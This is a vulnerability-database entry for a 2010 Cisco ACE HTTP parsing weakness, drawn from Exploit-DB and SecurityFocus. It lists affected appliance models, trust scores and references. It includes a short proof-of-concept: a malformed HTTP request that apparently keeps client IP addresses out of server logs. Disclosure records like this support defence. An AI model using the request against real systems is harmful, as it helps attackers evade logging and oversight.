Details of VAR-E-201005-0845

ID

VAR-E-201005-0845

EDB ID

33962

TITLE

Cisco Application Control Engine (ACE) - HTTP Parsing Security - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 33962

DESCRIPTION

Cisco Application Control Engine (ACE) - HTTP Parsing Security.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 33962

AFFECTED PRODUCTS

vendor:	cisco	model:	application control engine	scope:	-	version:	-	Trust: 1.0
vendor:	cisco	model:	ace application control engine module 3.0 a2	scope:	-	version:	-	Trust: 0.6
vendor:	cisco	model:	ace appliance a1	scope:	eq	version:	4710	Trust: 0.6
vendor:	cisco	model:	ace appliance	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ace appliance a3	scope:	eq	version:	4710	Trust: 0.3
vendor:	cisco	model:	ace appliance a2	scope:	eq	version:	4710	Trust: 0.3
vendor:	cisco	model:	ace appliance	scope:	eq	version:	47100	Trust: 0.3

sources: BID: 40002 // EXPLOIT-DB: 33962

EXPLOIT

source: https://www.securityfocus.com/bid/40002/info

Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries.

Attackers can exploit this issue to avoid having client IP addresses logged by servers.

GET / HTTP / 1 . 1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE

GET / HTTP/1.1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE

Trust: 1.0

sources: EXPLOIT-DB: 33962

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 33962

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 33962

TYPE

HTTP Parsing Security

Trust: 1.0

sources: EXPLOIT-DB: 33962

CREDITS

Alexis Tremblay

Trust: 0.6

sources: EXPLOIT-DB: 33962

EXTERNAL IDS

db:	BID	id:	40002	Trust: 1.9
db:	EXPLOIT-DB	id:	33962	Trust: 1.6
db:	EDBNET	id:	55347	Trust: 0.6

sources: BID: 40002 // EXPLOIT-DB: 33962 // EDBNET: 55347

REFERENCES

url:	https://www.securityfocus.com/bid/40002/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/33962/	Trust: 0.6
url:	http://www.cisco.com/en/us/products/ps6906/index.html	Trust: 0.3

sources: BID: 40002 // EXPLOIT-DB: 33962 // EDBNET: 55347

SOURCES

db:	BID	id:	40002
db:	EXPLOIT-DB	id:	33962
db:	EDBNET	id:	55347

LAST UPDATE DATE

2022-07-27T09:54:55.421000+00:00

SOURCES UPDATE DATE

db:

BID

id:

40002

date:

2010-05-07T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	40002	date:	2010-05-07T00:00:00
db:	EXPLOIT-DB	id:	33962	date:	2010-05-07T00:00:00
db:	EDBNET	id:	55347	date:	2010-05-07T00:00:00